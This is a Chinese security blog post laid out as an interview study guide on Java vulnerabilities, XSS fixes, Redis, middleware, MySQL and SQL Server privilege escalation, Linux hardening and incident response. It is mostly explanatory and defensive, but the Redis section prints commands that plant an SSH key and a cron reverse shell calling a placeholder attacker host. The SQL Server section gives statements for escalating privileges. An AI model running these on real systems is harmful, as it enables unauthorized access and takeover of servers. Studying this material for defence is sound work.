安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
[691. \u0023 字符编码及 payload 作用](#691. \u0023 字符编码及 payload 作用)
[692. Java 执行系统命令的漏洞与方法](#692. Java 执行系统命令的漏洞与方法)
[693-694. Java 修复 XSS 漏洞的层级与 Filter 设置](#693-694. Java 修复 XSS 漏洞的层级与 Filter 设置)
[695. Java 类反射的安全问题](#695. Java 类反射的安全问题)
[696. Java 反序列化漏洞与修复](#696. Java 反序列化漏洞与修复)
[697. 常见 Java 框架](#697. 常见 Java 框架)
[698. Redis 未授权访问漏洞利用](#698. Redis 未授权访问漏洞利用)
[699. 中间件解析漏洞利用](#699. 中间件解析漏洞利用)
[700-703. Java 中间件容器及安全](#700-703. Java 中间件容器及安全)
[704-705. MySQL 权限与安全加固](#704-705. MySQL 权限与安全加固)
[706. SQL Server Public 权限提权](#706. SQL Server Public 权限提权)
[707. Linux 系统加固思路](#707. Linux 系统加固思路)
[708-710. MySQL 存储与加密](#708-710. MySQL 存储与加密)
[711-716. Linux 安全运维](#711-716. Linux 安全运维)
[719. Linux 入侵应急响应](#719. Linux 入侵应急响应)
[720. 注入点数据库类型判断](#720. 注入点数据库类型判断)
691 \u0023是什么字符的16进制编码?为什么在payload中要用他? 692 java会不会发生执行系统命令的漏洞?java都有哪些语句,方法可以执行系统命令? 693 如果叫你修复一个xss漏洞,你会在java程序的那个层里面进行修复? 694 xss filter在java程序的哪里设置? 695 说下java的类反射在安全上可能存在哪些问题 696 Java反序列化漏洞的原理?解决方案? 697 你都了解哪些java框架? 698 Redis未授权访问漏洞如何入侵利用? 699 说说常见的中间件解析漏洞利用方式 700 JAVA有哪些比较常见的中间件容器? 701 tomcat要做哪些安全加固? 702 如果tomcat重启的话,webapps下,你删除的后台会不会又回来? 703 常见的网站服务器中间件容器。 704 mysql表权限里面,除了增删改查,文件读写,还有哪些权限? 705 mysql安全要如何做? 706 sqlserver public权限要如何提权 707 Windows、Linux、数据库的加固降权思路,任选其一 708 mysql的用户名密码是存放在那张表里面?mysql密码采用哪种加密方式? 709 mysql数据库默认有哪些库?说出库的名字 710 mysql UDF提权5.1以上版本和5.1以下有什么区别 711 简述Linux系统安全加固需要做哪些方面? 712 你使用什么工具来判断系统是否存在后门? 713 Linux的Selinux是什么?如何设置Selinux? 714 iptables工作在TCPIP模型中的哪层? 715 如果无法升级内核,那么如何保证系统不被已知的exp提权? 716 syslog里面都有哪些日志?安装软件的日志去哪找? 717 如何查询ssh的登录日志?如何配置syslog的日志格式? 718 syslog可不可以使用vi等工具直接查看?是二进制文件吗? 719 如果一台Linux服务器被入侵后 720 找到一个注入点怎么判断对方什么数据库?691.
\u0023字符编码及 payload 作用
- 字符本质 :Unicode 编码
\u0023对应#符号(ASCII 35)- Payload 作用 :
- 绕过过滤 :WAF 可能未解析 Unicode,
\u0023可替代#用于 CSS 选择器(如 XSS:<style>\u0023id{color:red}</style>)- 混淆攻击:在 JSON/JavaScript 中避免语法错误,维持代码结构
692. Java 执行系统命令的漏洞与方法
可能漏洞场景 :
未过滤的用户输入直接传入命令执行方法(如Runtime.exec())危险方法 :
Java
Runtime.getRuntime().exec("ping " + userInput); // 直接拼接导致命令注入 ProcessBuilder pb = new ProcessBuilder(userCommand); new GroovyShell().evaluate(userScript); // Groovy 引擎执行
693-694. Java 修复 XSS 漏洞的层级与 Filter 设置
修复层级 位置 修复方案 Controller 层 Spring MVC @Controller 输出前编码: StringEscapeUtils.escapeHtml4(userInput)View 层 JSP/Thymeleaf 模板引擎自动转义(Thymeleaf 默认开启) 全局过滤器 web.xml或Filter注册 XSS Filter:对 HttpServletRequest包装,重写getParameter()过滤
695. Java 类反射的安全问题
- 风险场景 :
- 敏感方法调用 :反射调用
setAccessible(true)突破私有限制- RCE 利用 :通过反射触发
Runtime.exec()- 反序列化攻击:反射构造恶意对象链
- 防御 :启用安全管理器
SecurityManager,配置策略文件限制反射权限
696. Java 反序列化漏洞与修复
- 原理 :
攻击者构造恶意序列化数据 ->ObjectInputStream.readObject()触发危险链(如 Apache Commons Collections 的Transformer链)- 解决方案 :
- 升级依赖库(如 Commons Collections 4.4+)
- 使用
SerialKiller等安全过滤器- 替换 JSON 序列化(Jackson/Gson)
697. 常见 Java 框架
框架类型 代表 安全关注点 Web 框架 Spring MVC, Struts2 OGNL 注入、路由劫持 ORM 框架 Hibernate, MyBatis SQL 注入( $拼接风险)依赖注入 Spring Boot 自动配置暴露未授权端点
698. Redis 未授权访问漏洞利用
写入 SSH 公钥 :
Bash
redis-cli -h 目标IP flushall echo -e "\n\nssh-rsa AAAAB3N...\n\n" | redis-cli -x set crackit redis-cli config set dir /root/.ssh/ && config set dbfilename authorized_keys定时任务反弹 Shell :
SET payload "\n* * * * * bash -i >& /dev/tcp/attacker/port 0>&1\n"
CONFIG SET dir /var/spool/cron/ && CONFIG SET dbfilename root
699. 中间件解析漏洞利用
中间件 漏洞形式 利用示例 Nginx 路径解析错误 /test.jpg/.php执行 PHP 代码Apache 多后缀解析( test.php.jpg)上传含 PHP 代码的 .php.jpgIIS 6.0 分号截断( test.asp;.jpg)图片马解析为 ASP
700-703. Java 中间件容器及安全
- 常见容器 :
Tomcat、Jetty、WebLogic、WebSphere- Tomcat 加固 :
- 删除默认应用:清空
webapps/ROOT/,webapps/docs/- 禁用管理界面:删除
webapps/manager/或配置强认证- 降权运行:创建专用用户启动 Tomcat
- 配置
server.xml:关闭autoDeploy,禁用 AJP 端口- 重启影响 :
删除的webapps下应用不会自动恢复(除非配置了热部署或外部仓库同步)
704-705. MySQL 权限与安全加固
- 表权限细分 :
CREATE ROUTINE(存储过程)、EXECUTE(执行)、SHOW VIEW(视图查看)- 安全加固 :
最小权限原则:禁止
FILE/PROCESS/SUPER权限配置文件安全:
Ini
[mysqld] skip_symbolic_links=ON # 禁用符号链接 local_infile=0 # 禁止本地文件加载加密通信:启用 SSL(
REQUIRE SSL)
706. SQL Server Public 权限提权
- 利用方式 :
- 滥用可信数据库:
sp_addrolemember 'db_owner', 'public'- 存储过程注入:利用
xp_cmdshell若未禁用- 模拟权限:
EXECUTE AS LOGIN = 'sa'结合漏洞提权
707. Linux 系统加固思路
账户安全 :
- 禁用 root SSH 登录,强制密钥认证
- 配置
sudo权限白名单文件系统 :
chattr +i /etc/passwd防篡改/tmp挂载为noexec,nosuid内核参数 :
Bash
sysctl -w kernel.randomize_va_space=2 # 开启 ASLR sysctl -w net.ipv4.icmp_echo_ignore_all=1 # 禁 Ping
708-710. MySQL 存储与加密
- 密码存储 :
表名:mysql.user
加密方式:
- MySQL 5.7 前:
SHA1(SHA1(password))+ 盐- MySQL 8.0+:
caching_sha2_password- 默认库 :
information_schema,mysql,performance_schema,sys- UDF 提权差异 :
- 5.1 以下 :DLL 放入
system32- 5.1 以上 :需放置到
plugin_dir指定目录
711-716. Linux 安全运维
加固要点 :
- SELinux :
- 模式设置:
setenforce 1(强制模式)- 策略管理:
semanage port -a -t http_port_t -p tcp 8080- iptables 层级:工作在网络层(OSI L3)
- 防已知 EXP :
- 禁用高危模块:
modprobe -r nf_nat_ftp- Seccomp 限制系统调用
日志分析 :
日志类型 路径 SSH 登录 /var/log/auth.log软件安装 /var/log/dpkg.log(Debian)Syslog 格式配置 /etc/rsyslog.conf
- Syslog 查看 :文本文件(
vi /var/log/syslog),非二进制
719. Linux 入侵应急响应
隔离网络:立即断网
取证备份 :
Bash
dd if=/dev/sda1 of=/evidence.img bs=1M # 磁盘镜像 ps auxf > /proc_list.txt # 进程快照排查后门 :
- 工具:
chkrootkit,rkhunter- 手动检查:
netstat -antp(异常连接)、crontab -l(恶意任务)
720. 注入点数据库类型判断
特征 数据库 注释符 --(末尾空格)Oracle, SQL Server #MySQL 字符串拼接 `'abc' CONCAT('a','b')MySQL 报错信息 ORA-xxxxOracle SQLSTATE[42S22]SQL Server